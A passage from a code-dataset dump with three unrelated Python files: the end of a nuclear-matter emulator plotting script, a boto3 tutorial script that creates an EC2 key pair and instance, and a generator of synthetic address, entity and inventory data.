np.loadtxt(in_dir)\n in_dir = \"./N_matrix.txt\"\n N = np.loadtxt(in_dir)\n in_dir = \"./K_matrix.txt\"\n K = np.loadtxt(in_dir)\n H = H + K \n # print(\"H=\"+str(H))\n # print(\"rank of N =\"+str(np.linalg.matrix_rank(N)))\n \n# eigvals,eigvec_L, eigvec_0 = spla.eig(H,N,left =True,right=True)\n eigvals = H\n# loop2 = 0\n# for loop1 in range(subspace_dimension):\n# ev = eigvals[loop1]\n# if ev.imag > 0.01:\n# continue\n# # if ev.real < 0:\n# # continue\n# loop2 = loop2+1\n#\n# ev_all = np.zeros(loop2)\n# loop2 = 0\n# for loop1 in range(subspace_dimension):\n# ev = eigvals[loop1]\n# if ev.imag >0.01 :\n# continue\n# # if ev.real < 0:\n# # continue\n# ev_all[loop2] = ev.real\n# loop2 = loop2+1\n#\n# ev_sorted = sorted(ev_all)\n #print('eigvals='+str (ev_sorted))\n #print('eigvec_L='+str (eigvec_L))\n #print('eigvec_0='+str (eigvec_0))\n\n #print('eigvals_gs='+str (ev_sorted[1]))\n
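    # A minimal illustrative sketch (kept as comments; spla is scipy.linalg as
    # imported above) of recovering the ground-state energy from the
    # generalized eigenvalue problem H v = E N v that the 'solve_general_EV'
    # option writes out:
    #
    #   gen_evs = spla.eigvals(H, N)
    #   real_evs = sorted(ev.real for ev in gen_evs if abs(ev.imag) < 0.01)
    #   gs_energy = real_evs[0]   # lowest real eigenvalue ~ emulated CCD energy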
# print (\"ccd energy from emulator:\"+str(ev_sorted[0]))\n return eigvals,eigvals\n\n\n\n\n\n\n\n######################################################\n######################################################\n#### MAIN density extrapolation (validation)\n######################################################\n######################################################\nsubspace_dimension = 1 \nLEC_num = 17\nLEC_range = 0.2\nLEC = np.ones(LEC_num)\nnucl_matt_exe = './prog_ccm.exe'\ndatabase_dir = '/work/Eigenvector_continuation/CCM_kspace_deltafull/test/backup/DNNLOgo450_dens_5points' \n\n\n#print (\"ev_all=\"+str(ev_all))\n\n# start validation \n\ndens_min = 0.14\ndens_max = 0.30\ndens_gap = 0.02\ndens_count = int((dens_max - dens_min) / dens_gap + 2)\nprint (dens_count)\ndens = np.zeros(dens_count)\nccd_cal = np.zeros(dens_count) \nemulator_cal = np.zeros(dens_count) \n\nfor loop1 in range(dens_count):\n dens[loop1] = dens_min + ( dens_gap * loop1)\n print(\"density = \"+str(dens))\n file_path = \"ccm_in_DNNLO450\"\n LEC = read_LEC(file_path)\n #ccd_cal[loop1] = nuclear_matter(LEC,dens[loop1])\n ccd_cal[loop1] = 0\n emulator_cal[loop1], ev_all = emulator(LEC,dens[loop1])\n file_path = \"density_extrapolation.txt\"\n with open(file_path,'a') as f_1:\n f_1.write('dens=%.4f ccd = %.12f emulator = %.12f \\n' % (dens[loop1],ccd_cal[loop1], emulator_cal[loop1]))\n file_path = \"density_extrapolation_detail.txt\"\n with open(file_path,'a') as f_2:\n f_2.write('dens=%.4f ccd = %.12f emulator = %.12f all =' % (dens[loop1], ccd_cal[loop1], emulator_cal[loop1]))\n f_2.write(str(ev_all))\n f_2.write('\\n')\n\n\n# plot\nx_list_1 = dens # dens\ny_list_1 = ccd_cal # ccd\ny_list_2 = emulator_cal # extrapolation\n\nprint(x_list_1)\nprint(y_list_1)\n\n\nfile_path = \"subspace_sample_5point.txt\"\ndata_num = input_raw_data_count(file_path)\nraw_data_2 = np.zeros((data_num,2),dtype = float)\ninput_file_2(file_path,raw_data_2)\n\nx_list_3 = raw_data_2[:,0] # subspace data\ny_list_3 = raw_data_2[:,1] #\n\nprint(x_list_3)\nprint(y_list_3)\n\ninterpol_count = 100 \n\ndens = x_list_1\nspl_pnm = interpolate.UnivariateSpline(dens,y_list_2,k = 5)\nspldens = np.linspace(dens[0],dens[len(dens)-1],num=interpol_count)\n\ninterp_pnm = spl_pnm(spldens)\n\nx_list_2_new = spldens\ny_list_2_new = interp_pnm \n\n# start plotting\nfig1 = plt.figure('fig1')\nl1 = plt.scatter(x_list_1,y_list_1,color = 'r', marker = 'd',zorder=1,label=\"CCD calculation\")\nl2 = plt.plot(x_list_2_new,y_list_2_new,color = 'k',linestyle=':',linewidth=1.5,alpha=0.9, label=\"SP-CC(5)\",zorder=1)\nl3 = plt.plot(x_list_3,y_list_3,color = 'k', marker = 'o',markersize = 10,markerfacecolor='none',linestyle='',zorder=3, label=\"subspace samples\")\n\n#plt.yticks(np.arange(8,24,2),fontsize = 13) \n#plt.xticks(np.arange(0.12,0.205,0.01),fontsize = 13) \nplt.legend(loc='lower right',fontsize = 13)\n\nplt.ylabel('$E/A$ [MeV]',fontsize=18)\nplt.xlabel(r\"$\\rho$ [fm$^{-3}$]\",fontsize=18)\n\nplot_path = 'density_extrapolation.pdf'\nplt.savefig(plot_path,bbox_inches='tight')\n\n\n\n\n\n\n\n\n\n","sub_path":"test/dens_extrapolation.py","file_name":"dens_extrapolation.py","file_ext":"py","file_size_in_byte":11398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"653894933","text":"import 
boto3\nec2_cli=boto3.client('ec2')\noutfile=open('ec2_key.pem','w')\nkeypair=ec2_cli.create_key_pair(KeyName='ec2_key')\noutfile.write(keypair['KeyMaterial'])\ninstance=ec2_cli.run_instances(\n ImageId='ami-0affd4508a5d2481b',\n InstanceType='t2.micro',\n MinCount=1,\n MaxCount=1,\n KeyName='ec2_key',\n SecurityGroupIds=['All_TCP_IP'],\n TagSpecifications=[\n {\n 'ResourceType':'instance',\n 'Tags':[\n {\n 'Key':'Name',\n 'Value':'with-python'\n }\n ]\n }\n ]\n\t )\n \n","sub_path":"Udemy/BOTO3/check/create_key_inst.py","file_name":"create_key_inst.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"372935806","text":"import re\nimport json\nimport random\nimport enum\nimport sys\nimport unittest\nfrom src.main.utils import myutils\n\ndef p(s):\n print(s)\n\nclass sql_data_maker:\n\n '''\n table0 cities\n id,state,city,base_zip\n table1 address\n address\n id,id_cities,street,address,unit,zip,id_address_type\n table2 entity_type\n id,entity_category,entity_type,entity_name\n table3 owner_of_address\n id,id_address,id_entity_buyer,id_entity_seller,purchase_price,purchase_date\n table4 entities\n id,namefirst,namelast,id_entity_type,start_date,end_date\n table5 inventory_catalog\n id,id_entity_type,id_address,msrp\n table6 inventory_receipts\n id,id_entity_from,id_entity_toe,id_address_from,id_address_to,purchase_price,qty,date\n table7 relationships\n id_src,id_dst,relationship_type\n\n\nd_relationships:{\n id0:{\n S_ENTITY_RELATE_SIBLING: {id1,id2}, # not objects!\n S_ENTITY_RELATE_PARENT: {id3,id4},\n S_ENTITY_RELATE_COUPLE: {id5,id6},\n S_ENTITY_RELATE_CHILD: {id7,id8}\n },\n id1:{\n S_ENTITY_RELATE_SIBLING: {id0,id2},\n S_ENTITY_RELATE_PARENT: {id3,id4},\n S_ENTITY_RELATE_COUPLE: {id6},\n S_ENTITY_RELATE_CHILD: {id9,id10}\n },\n}\n\nd_entities:{\n id0:{\n S_ID:id,\n S_ENTITY_FIRSTNAME:str,\n S_ENTITY_LASTNAME:str,\n S_ENTITY_TYPE:leaf value of S_ENTITY_TYPE\n },\n id1:{\n S_ID:id,\n S_ENTITY_FIRSTNAME:str,\n S_ENTITY_LASTNAME:str,\n S_ENTITY_TYPE:leaf value of S_ENTITY_TYPE\n }\n}\n\n\ndata\n|\n+---S_DATAKEY_STATES\n |\n +---STATE1\n | |\n | +---S_DATAKEY_CITIES\n | |\n | +---CITY1\n | | |\n | | +---S_KEY_CITY_BASE_ZIP:v\n | | |\n | | +---S_DATAKEY_STREETS\n | | |\n | | +---STREET1\n | | | |\n | | | +---S\n | | | +---S_DATAKEY_ADDRS\n | | | |\n | | | +---ADDR1\n | | | | |\n | | | | +---S_DATAKEY_ADDR_ZIP:v\n | | | | +---S_DATAKEY_ADDR_NUM_ID:v\n | | | | +---S_DATAKEY_ADDR_UNIT_ID:v\n | | | | +---S_DATAKEY_ADDR_TYPE:v\n | | | |\n | | | +---ADDR2\n | | |\n | | +---STREET2\n | |\n | +---CITY2\n |\n +---STATE2\n\ninventory\n|\n+---S_CAT_CONSUME\n |\n +---S_CONSUME_FRUITS\n | |\n | +---S_ARRAY\n | |\n | 0---apple\n | | |\n | | +---S_MSRP:price\n | | |\n | | +---S_ARRAY_PRICEPOINTS:[price0,price1,price2,price3,price4]\n | |\n | 1---banana\n | |\n | +---S_ARRAY_PRICEPOINTS:[price0,price1,price2,price3,price4]\n |\n +---S_CONSUME_VEGS\n |\n +---S_ARRAY\n |\n 0---tomato\n\ninventory_durables\n\n'''\n S_CAT_ADDR = 'category_address'\n S_ADDR_RES = 'resident'\n S_ADDR_RES_VIRT = 'resident_virtual'\n S_ADDR_RES_LAND = 'resident_land'\n S_ADDR_BUS = 'business'\n S_RES_PRIM_LAND = 'primary_land'\n S_RES_PRIM_VIRT = 'primary_virtual'\n S_RES_SEC_LAND = 'secondary_land'\n S_RES_SEC_VIRT = 'secondary_virtual'\n S_BUS_PRV = 'business_private'\n S_BUS_PUB = 'business_public'\n S_CAT_CONSUME = 'category_consume'\n S_CONSUME_FRUITS = 'fruits'\n S_CONSUME_VEGS = 'vegs'\n S_CONSUME_GRAINS = 'grains'\n 
S_CONSUME_MEAT = 'meat'\n S_CONSUME_DRINK = 'drink'\n S_CAT_DURABLES = 'durables'\n S_DURABLE_SHIRTS = 'shirts'\n S_DURABLE_PANTS = 'pants'\n S_DURABLE_CLOTHES = 'clothes'\n S_DURABLE_ACC = 'accessories'\n\n S_ITEM_NAME = 'itemname'\n S_NUM_PRICEPOINTS = 5\n S_CONSUME_PRICEPOINTS_PCT = [50,75,100,150,300]\n S_DURABLE_PRICEPOINTS_PCT = [50,100,150,300,800]\n S_ARRAY_PRICEPOINTS = 'pricepoints'\n S_MSRP = 'msrp'\n S_ARRAY = 'array'\n S_CONSUME_MSRP_MIN_PCT = 50\n S_CONSUME_MSRP_MAX_PCT = 200\n S_CONSUME_LEVEL_MIN_PCT = 50\n S_CONSUME_LEVEL_MAX_PCT = 300\n S_DURABLE_MSRP_MIN_PCT = 50\n S_DURABLE_MSRP_MAX_PCT = 200\n S_DURABLE_LEVEL_MIN_PCT = 50\n S_DURABLE_LEVEL_MAX_PCT = 800\n\n S_PCT_TO_SELECT_MIN = 30\n S_PCT_TO_SELECT_MAX = 80\n S_EXPENSE_LEVEL_MIN = 0\n S_EXPENSE_LEVEL_MAX = 5\n\n S_CONSUME_FRUITS_MSRP = 40\n S_CONSUME_VEGS_MSRP = 20\n S_CONSUME_GRAINS_MSRP = 50\n S_CONSUME_MEAT_MSRP = 80\n S_CONSUME_DRINK_MSRP = 20\n S_DURABLE_SHIRTS_MSRP = 200\n S_DURABLE_PANTS_MSRP = 300\n S_DURABLE_ACC_MSRP = 400\n S_ZIP_INC_THRESHOLD = 20\n S_ZIP = 'zip'\n S_STREET = 'streetname'\n S_ADDR = 'addr_num'\n S_ADDR_UNIT = 'addr_unit_num'\n S_ADDR_TYPE = 'addr_type'\n S_ADDRESSES = 'addresses'\n S_SELECT_LIKELY_PCT = 80\n S_ENTITY_RELATIONSHIP = 'relationship'\n S_ENTITY_RELATE_SIBLING = 'sibling'\n S_ENTITY_RELATE_PARENT = 'parent'\n S_ENTITY_RELATE_COUPLE = 'couple'\n S_ENTITY_RELATE_CHILD = 'child'\n S_ENTITY_FIRSTNAME = 'firstname'\n S_ENTITY_LASTNAME = 'lastname'\n S_ENTITY_START_DATE = 'startdate'\n S_ENTITY_END_DATE = 'enddate'\n S_ENTITY_MALE = 'male'\n S_ENTITY_FEMALE = 'female'\n S_ENTITY_OTHER = 'other'\n S_ENTITY_TYPE = 'entity_type'\n S_ENTITYT_PERSON = 'entityt_person'\n S_ENTITYT_VIRTUAL = 'entityt_virtual'\n S_ENTITYT_ANIMAL = 'entityt_animal'\n S_ENTITYT_FARM_ANIMAL = 'entityt_farm_animal'\n S_ENTITYT_HOUSE_ANIMAL = 'entityt_house_animal'\n S_ENTITYT_WILD_ANIMAL = 'entityt_wild_animal'\n S_BASE_ZIP = 'base_zip'\n S_KEY_CITY_BASE_ZIP = 'city_base_zip'\n S_DATAKEY_STATES = 'states'\n S_DATAKEY_CITIES = 'cities'\n S_DATAKEY_STREETS = 'streets'\n S_DATAKEY_STREET_NAME = 'street_name'\n S_DATAKEY_ADDRS = 'addresses'\n S_DATAKEY_ADDR_UNITS = 'address_units'\n S_DATAKEY_ADDR_ZIP = 'zip'\n S_DATAKEY_ADDR_NUM_ID = 'id_addr_num'\n S_DATAKEY_ADDR_UNIT_ID = 'id_addr_unit'\n S_DATAKEY_ADDR_TYPE = 'addr_type'\n S_ID = 'id'\n\n\n def __init__(self):\n self.entity_types = self.make_entity_type()\n self.data_entities = {\n self.S_ENTITYT_PERSON:{},\n self.S_ENTITYT_VIRTUAL:{},\n self.S_ENTITYT_ANIMAL:{}\n }\n self.d_msrp = {\n self.S_CONSUME_FRUITS: self.S_CONSUME_FRUITS_MSRP,\n self.S_CONSUME_VEGS: self.S_CONSUME_VEGS_MSRP,\n self.S_CONSUME_GRAINS: self.S_CONSUME_GRAINS_MSRP,\n self.S_CONSUME_MEAT: self.S_CONSUME_MEAT_MSRP,\n self.S_CONSUME_DRINK: self.S_CONSUME_DRINK_MSRP,\n self.S_DURABLE_PANTS: self.S_DURABLE_PANTS_MSRP,\n self.S_DURABLE_SHIRTS: self.S_DURABLE_SHIRTS_MSRP,\n self.S_DURABLE_ACC: self.S_DURABLE_ACC_MSRP\n }\n self.data_relationships = {}\n self.data_addresses = {}\n self.inventory = {}\n self.min_address_per_street = 1\n self.max_address_per_street = 5\n self.address_starting_val = 10\n self.pct_chance_of_unit_if_has_virtual = 50\n self.min_num_streets_threshold_for_units = 2\n self.pct_has_units_in_city = 25\n self.pct_has_units_in_street = 50\n self.pct_has_units_in_address = 50\n self.min_unit_per_address = 2\n self.max_unit_per_address = 10\n self.min_num_people_per_state = 50\n self.max_num_people_per_state = 100\n self.max_num_person = 1000\n self.max_num_virtual = 200\n 
self.max_num_animal = 2000\n self.max_num_children_per_couple = 6\n self.max_level_relationship_descendants = 10\n self.num_original_descendants = 20\n self.pct_carry_over_currgen_2_nextgen = 20\n self.u = myutils.my_utils\n pass\n\n def test_make_receipt_table_1(self):\n products = {\n 'apples':{\n 'product_type':'food',\n 'product_subtype':'fruit',\n 'avg_price':1.00,\n 'variation':0.50,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'bananas':{\n 'product_type':'food',\n 'product_subtype':'fruit',\n 'avg_price':2.00,\n 'variation':0.50,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'milk':{\n 'product_type':'food',\n 'product_subtype':'dairy',\n 'avg_price':5.00,\n 'variation':1.50,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'coffee':{\n 'product_type':'food',\n 'product_subtype':'beverage',\n 'avg_price':7.00,\n 'variation':5.00,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'tea':{\n 'product_type':'food',\n 'product_subtype':'beverage',\n 'avg_price':4.00,\n 'variation':4.00,\n 'is_bulkable':True,\n 'is_manufactued':False\n },\n 'socks':{\n 'product_type':'fashion',\n 'product_subtype':'clothes',\n 'avg_price':8.00,\n 'variation':5.00,\n 'is_bulkable':True,\n 'is_manufactued':True\n },\n 'shirts':{\n 'product_type':'fashion',\n 'product_subtype':'clothes',\n 'avg_price':20.00,\n 'variation':20.00,\n 'is_bulkable':True,\n 'is_manufactued':True\n },\n 'sunglasses':{\n 'product_type':'fashion',\n 'product_subtype':'accessories',\n 'avg_price':30.00,\n 'variation':30.00,\n 'is_bulkable':True,\n 'is_manufactued':True\n },\n 'phone':{\n 'product_type':'electronics',\n 'product_subtype':'communications',\n 'avg_price':500.00,\n 'variation':200.00,\n 'is_bulkable':False,\n 'is_manufactued':True\n },\n 'laptop':{\n 'product_type':'electronics',\n 'product_subtype':'productivity',\n 'avg_price':1000.00,\n 'variation':2000.00,\n 'is_bulkable':False,\n 'is_manufactued':True\n }\n }\n\n\n def make_names(self,min_syllables,max_syllables,consonants,vowels,num,allow_duplicates):\n num_possibilities = len(consonants)*len(vowels)*(max_syllables-min_syllables+1)\n if(not allow_duplicates and num_possibilities < num):\n raise Exception('ERROR make_names: num:{} > num_possibilities:{}'.format(num,num_possibilities))\n data = []\n data_set = set()\n max_attempts = 100_000\n ctr = 0\n while len(data) < num:\n num_syllables = myutils.my_utils.rand_int(min_syllables,max_syllables)\n name = myutils.my_utils.make_random_word_from_charset(consonants,vowels,num_syllables,False)\n if allow_duplicates or name not in data_set:\n data.append(name)\n data_set.add(name) # record the name so the duplicate check actually works\n ctr += 1\n if ctr > max_attempts:\n break\n return data\n def make_state_names(self,num):\n consonants = ['b','c','d','f','g']\n vowels = ['a','e','i','o']\n data = self.make_names(1,3,consonants,vowels,num,False)\n assert isinstance(data,list)\n return data\n def make_city_names(self,num):\n consonants = ['f','g','h','j','k']\n vowels = ['a','e','i','o']\n data = self.make_names(1,3,consonants,vowels,num,False)\n assert isinstance(data,list)\n return data\n def make_street_names(self,num):\n consonants = ['f','g','h','j','k']\n vowels = ['a','e','i','o']\n data = self.make_names(1,3,consonants,vowels,num,False)\n assert isinstance(data,list)\n return data\n def make_last_names(self,num):\n consonants = ['b','m','p']\n vowels = ['a','o']\n data = self.make_names(1,3,consonants,vowels,num,True)\n assert isinstance(data,list)\n return data\n def make_first_names(self,num):\n consonants = ['b','c','d','g','h','j']\n vowels = 
['a','e','i','o']\n data = self.make_names(1,3,consonants,vowels,num,True)\n assert isinstance(data,list)\n return data\n def make_virtual_names(self,num):\n consonants = ['b','c','d','g','h','j']\n vowels = ['a','e']\n data = self.make_names(2,5,consonants,vowels,num,True)\n assert isinstance(data,list)\n return data\n def make_animal_names(self,num):\n consonants = ['g','m','p']\n vowels = ['a','o']\n data = self.make_names(1,3,consonants,vowels,num,True)\n assert isinstance(data,list)\n return data\n def make_table_cities(self,num_states,min_cities_per_state,max_cities_per_state):\n data = self.data_addresses\n states = self.make_state_names(num_states)\n base_zip = 10000\n d_states = {}\n data[self.S_DATAKEY_STATES] = d_states\n for state in states:\n d_states[state] = {}\n d_cities = {}\n d_states[state][self.S_DATAKEY_CITIES] = d_cities\n num_cities = myutils.my_utils.rand_int(min_cities_per_state,max_cities_per_state)\n cities = self.make_city_names(num_cities)\n offset = 0\n for city in cities:\n d_cities[city] = {}\n d_cities[city][self.S_DATAKEY_STREETS] = {}\n d_cities[city][self.S_KEY_CITY_BASE_ZIP] = base_zip + offset*10 # so each city can have max 10 zips\n offset += 1\n base_zip += 1000\n return data\n\n def make_entity_type(self):\n data = {}\n data[self.S_CAT_ADDR] = {\n self.S_ADDR_RES: {\n self.S_ADDR_RES_VIRT:[\n self.S_RES_PRIM_VIRT,\n self.S_RES_SEC_VIRT\n ],\n self.S_ADDR_RES_LAND:[\n self.S_RES_PRIM_LAND,\n self.S_RES_SEC_LAND\n ]\n },\n self.S_ADDR_BUS:[\n self.S_BUS_PRV,\n self.S_BUS_PUB\n ]\n }\n data[self.S_ENTITY_TYPE] = {\n self.S_ENTITYT_PERSON: [self.S_ENTITY_FEMALE,self.S_ENTITY_MALE],\n self.S_ENTITYT_VIRTUAL: ['company','govt','club'],\n self.S_ENTITYT_ANIMAL: {\n self.S_ENTITYT_FARM_ANIMAL: ['farmchicken','farmfish','farmlamb'],\n self.S_ENTITYT_HOUSE_ANIMAL: ['housecat','housedog'],\n self.S_ENTITYT_WILD_ANIMAL: ['wildcat','wilddog','wildbird','wildraccoon','wildfish']\n }\n }\n data[self.S_ENTITY_RELATIONSHIP] = [\n self.S_ENTITY_RELATE_SIBLING,\n self.S_ENTITY_RELATE_PARENT,\n self.S_ENTITY_RELATE_COUPLE,\n self.S_ENTITY_RELATE_CHILD\n ]\n data[self.S_CAT_CONSUME] = {\n self.S_CONSUME_FRUITS: ['apple','banana','orange'],\n self.S_CONSUME_VEGS: ['tomato','carrot','onion','beans','potato'],\n self.S_CONSUME_GRAINS: ['rice','bread','lentil'],\n self.S_CONSUME_MEAT: ['chicken','fish','lamb'],\n self.S_CONSUME_DRINK: ['water','juice','tea','coffee','milk','wine']\n }\n data[self.S_CAT_DURABLES] = {\n self.S_DURABLE_PANTS: ['pant','shorts','wrap','jeans'],\n self.S_DURABLE_SHIRTS: ['tshirt','jacket','wrap','longsleeve','shortsleeve'],\n self.S_DURABLE_ACC: ['shoes','wallet','purse','hat','sunglass']\n }\n return data\n\n def choose_type(self,list_path_keys,num_elements=1):\n def traverse_subpaths_extend_leafs(kvnode,leafs):\n if isinstance(kvnode,list):\n leafs.extend(kvnode)\n elif isinstance(kvnode,dict):\n for k,v in kvnode.items():\n traverse_subpaths_extend_leafs(v,leafs)\n data = self.entity_types\n if not isinstance(list_path_keys,list) or list_path_keys == None:\n raise Exception('ERROR list_path_keys is not list or is null')\n for path in list_path_keys:\n if path not in data:\n raise Exception('ERROR choose_type:{} not in entity_types:{}'.format(path,data.keys()))\n data = data[path]\n leafs = []\n traverse_subpaths_extend_leafs(data,leafs)\n sz = len(leafs)\n res = []\n for ctr in range(num_elements):\n i = myutils.my_utils.rand_int(0,sz)\n res.append(leafs[i])\n return res\n\n def make_table_addresses(self, data, min_num_streets, 
max_num_streets):\n '''\n data input is dict and has figure1 layout in class description\n '''\n min_inc_val = 1\n max_inc_val = 10\n for state,cities in data[self.S_DATAKEY_STATES].items():\n for city,d_city in cities[self.S_DATAKEY_CITIES].items():\n num_streets = myutils.my_utils.rand_int(min_num_streets,max_num_streets)\n has_virtual = True if num_streets >= self.min_num_streets_threshold_for_units else False\n has_units_c = myutils.my_utils.rand_bool(self.pct_chance_of_unit_if_has_virtual)\n zip_val = d_city[self.S_KEY_CITY_BASE_ZIP]\n d_streets = {}\n d_city[self.S_DATAKEY_STREETS] = d_streets\n cnt_addr = 0\n street_names = self.make_street_names(num_streets)\n for street_name in street_names:\n street = {}\n d_streets[street_name] = street\n #d_streets[self.S_DATAKEY_STREET_NAME] = street\n street[self.S_DATAKEY_STREET_NAME] = street_name\n #d_streets[self.S_DATAKEY_STREET_NAME] = street_name\n d_addresses = {}\n #d_streets[self.S_DATAKEY_ADDRS] = d_addresses\n street[self.S_DATAKEY_ADDRS] = d_addresses\n num_addresses = myutils.my_utils.rand_int(self.min_address_per_street,self.max_address_per_street)\n id_address_val = self.address_starting_val\n inc_val = myutils.my_utils.rand_int(min_inc_val,max_inc_val) # address 100,105,110,...\n pct_business = myutils.my_utils.get_rand_pct(1,4) if has_units_c else 0 # 0,25,50,75,100\n has_units_s = myutils.my_utils.rand_bool(self.pct_has_units_in_street) if has_units_c else False\n for i in range(num_addresses):\n is_business = myutils.my_utils.pct_is_true(pct_business)\n addr_type = self.choose_type([self.S_CAT_ADDR,self.S_ADDR_BUS]) if is_business else self.choose_type([self.S_CAT_ADDR,self.S_ADDR_RES])\n has_unit_s = myutils.my_utils.rand_bool(self.pct_has_units_in_address) if has_units_s else False\n if addr_type[0] == self.S_RES_PRIM_LAND or addr_type[0] == self.S_RES_SEC_LAND:\n has_unit_s = False\n address_obj = {}\n #address_obj[self.S_STREET] = street_name\n address_obj[self.S_ZIP] = zip_val\n if has_unit_s:\n num_units = myutils.my_utils.rand_int(self.min_unit_per_address,self.max_unit_per_address)\n d_address_units = {}\n address_obj[self.S_DATAKEY_ADDR_UNITS] = d_address_units\n address_obj[self.S_ADDR_TYPE] = addr_type[0]\n d_addresses[id_address_val] = address_obj\n #d_addresses[self.S_DATAKEY_ADDR_UNITS] = d_address_units\n #d_addresses[id_address_val] = d_address_units\n for id_address_unit in range(num_units):\n id_address_unit += 1\n address_unit_obj = address_obj.copy()\n del address_unit_obj[self.S_DATAKEY_ADDR_UNITS] # the shallow copy carries the parent's units dict; drop it so storing the unit below cannot create a circular reference\n addr_type = self.choose_type([self.S_CAT_ADDR,self.S_ADDR_BUS]) if is_business else self.choose_type([self.S_CAT_ADDR,self.S_ADDR_RES,self.S_ADDR_RES_VIRT])\n address_unit_obj[self.S_ADDR_TYPE] = addr_type[0]\n address_unit_obj[self.S_ADDR_UNIT] = id_address_unit\n d_address_units[id_address_unit] = address_unit_obj # store the unit; it was built and counted but never kept\n cnt_addr += 1\n else:\n address_obj[self.S_ADDR_TYPE] = addr_type[0]\n d_addresses[id_address_val] = address_obj\n cnt_addr += 1\n id_address_val += inc_val\n if cnt_addr > self.S_ZIP_INC_THRESHOLD:\n zip_val += 1\n cnt_addr = 1\n\n return data\n\n def make_table_entities(self):\n '''\n entities:{\n S_ENTITYT_PERSON: {\n id1:{\n id,\n namefirst,namelast,\n id_entity_type (S_ENTITY_TYPE),\n start_date: date\n end_date: date\n },\n id2:{...},\n ...\n },\n S_ENTITYT_VIRTUAL: {\n ...\n },\n S_ENTITYT_ANIMAL: {\n ...\n },\n }\n '''\n\n data_entities = self.data_entities\n data_relationships = self.data_relationships\n\n self.make_people_and_relationships(data_entities[self.S_ENTITYT_PERSON],data_relationships)\n\n id = 0\n virtualnames = 
list(self.make_virtual_names(self.max_num_virtual))\n for virtualname in virtualnames:\n etype = self.choose_type([self.S_ENTITY_TYPE,self.S_ENTITYT_VIRTUAL])\n entity = {\n self.S_ID:id,\n self.S_ENTITY_FIRSTNAME:None,\n self.S_ENTITY_LASTNAME:virtualname,\n self.S_ENTITY_TYPE:etype[0]\n }\n data_entities[self.S_ENTITYT_VIRTUAL][id] = entity\n id += 1\n\n\n id = 0\n animal_names = list(self.make_animal_names(self.max_num_animal))\n for i in range(self.max_num_animal):\n etype = self.choose_type([self.S_ENTITY_TYPE,self.S_ENTITYT_ANIMAL])\n name = None\n if etype[0] in self.entity_types[self.S_ENTITY_TYPE][self.S_ENTITYT_ANIMAL][self.S_ENTITYT_HOUSE_ANIMAL]:\n name = animal_names[i]\n entity = {\n self.S_ID:id,\n self.S_ENTITY_FIRSTNAME:name,\n self.S_ENTITY_LASTNAME:None,\n self.S_ENTITY_TYPE:etype[0]\n }\n data_entities[self.S_ENTITYT_ANIMAL][id] = entity\n id += 1\n return (data_entities,data_relationships)\n\n def make_people_and_relationships(self, dentities, drelationships):\n\n def init_relationship_id(drelationship,id):\n if id not in drelationship:\n drelationship[id] = {\n self.S_ENTITY_RELATE_SIBLING:[],\n self.S_ENTITY_RELATE_PARENT:[],\n self.S_ENTITY_RELATE_COUPLE:[],\n self.S_ENTITY_RELATE_CHILD:[]\n }\n\n def make_asymmetrical_relationship(e0,e1,keyid,key0to1,key1to0,drelationships):\n init_relationship_id(drelationships,e0[keyid])\n init_relationship_id(drelationships,e1[keyid])\n drelationships[e0[keyid]][key0to1].append(e1[keyid])\n drelationships[e1[keyid]][key1to0].append(e0[keyid])\n\n def make_symmetrical_relationship(e0,e1,keyid,key,drelationships):\n make_asymmetrical_relationship(e0,e1,keyid,key,key,drelationships)\n\n def match_simple(l_entity_males,l_entity_females,drelationships,allow_overlap=True):\n keyid = self.S_ID\n key = self.S_ENTITY_RELATE_COUPLE\n lm_unmatched = []\n lf_unmatched = []\n for m,f in zip(l_entity_males,l_entity_females):\n make_symmetrical_relationship(m,f,keyid,key,drelationships)\n\n szm = len(l_entity_males)\n szf = len(l_entity_females)\n if szm == szf or not allow_overlap:\n return\n elif szm < szf:\n for i in range(szm,szf):\n f = l_entity_females[i]\n m = self.u.choose_obj_from(l_entity_males)\n make_symmetrical_relationship(m,f,keyid,key,drelationships)\n else:\n for i in range(szf,szm):\n m = l_entity_males[i]\n f = self.u.choose_obj_from(l_entity_females)\n make_symmetrical_relationship(m,f,keyid,key,drelationships)\n\n # return (listfemale,listmale) from entities\n def get_m_f(entities):\n lm = []\n lf = []\n st = self.S_ENTITY_TYPE\n sm = self.S_ENTITY_MALE\n sf = self.S_ENTITY_FEMALE\n for e in entities:\n if e[st] == sm:\n lm.append(e)\n elif e[st] == sf:\n lf.append(e)\n return (lf,lm)\n\n def make_children(arrayid,f,dentities,drelationships):\n scouple = self.S_ENTITY_RELATE_COUPLE\n schild = self.S_ENTITY_RELATE_CHILD\n sparent = self.S_ENTITY_RELATE_PARENT\n ssibling = self.S_ENTITY_RELATE_SIBLING\n sid = self.S_ID\n smale = self.S_ENTITY_MALE\n stype = self.S_ENTITY_TYPE\n slname = self.S_ENTITY_LASTNAME\n sfname = self.S_ENTITY_FIRSTNAME\n lmaleids = []\n\n # choose random male\n for id in drelationships[f[sid]][scouple]:\n if dentities[id][stype] == smale:\n lmaleids.append(id)\n idm = self.u.choose_obj_from(lmaleids)\n m = dentities[idm]\n lastname = self.u.choose_obj_from([f[slname],m[slname]])\n num_children = self.u.rand_int(0,self.max_num_children_per_couple)\n firstnames = self.make_first_names(num_children)\n lchildren = []\n for i in range(num_children):\n etype = 
self.choose_type([self.S_ENTITY_TYPE,self.S_ENTITYT_PERSON])\n entity = { sid:arrayid[0], sfname:firstnames[i], slname:lastname, stype:etype[0] }\n lchildren.append(entity)\n dentities[entity[sid]] = entity\n arrayid[0] += 1\n if arrayid[0] >= self.max_num_person:\n break\n\n # make relationships\n for i in range(len(lchildren)):\n child = lchildren[i]\n make_asymmetrical_relationship(m,child,sid,schild,sparent,drelationships)\n make_asymmetrical_relationship(f,child,sid,schild,sparent,drelationships)\n for j in range(i,len(lchildren)):\n sibling = lchildren[j]\n if child[sid] == sibling[sid]:\n continue\n make_symmetrical_relationship(child,sibling,sid,ssibling,drelationships)\n\n return lchildren\n\n def make_people_relationships(arrayid,dentities,drelationships):\n lcurrgen = list(dentities.values())\n while arrayid[0] < self.max_num_person:\n (lf,lm) = get_m_f(lcurrgen)\n if len(lf) == 0 or len(lm) == 0:\n return # no more 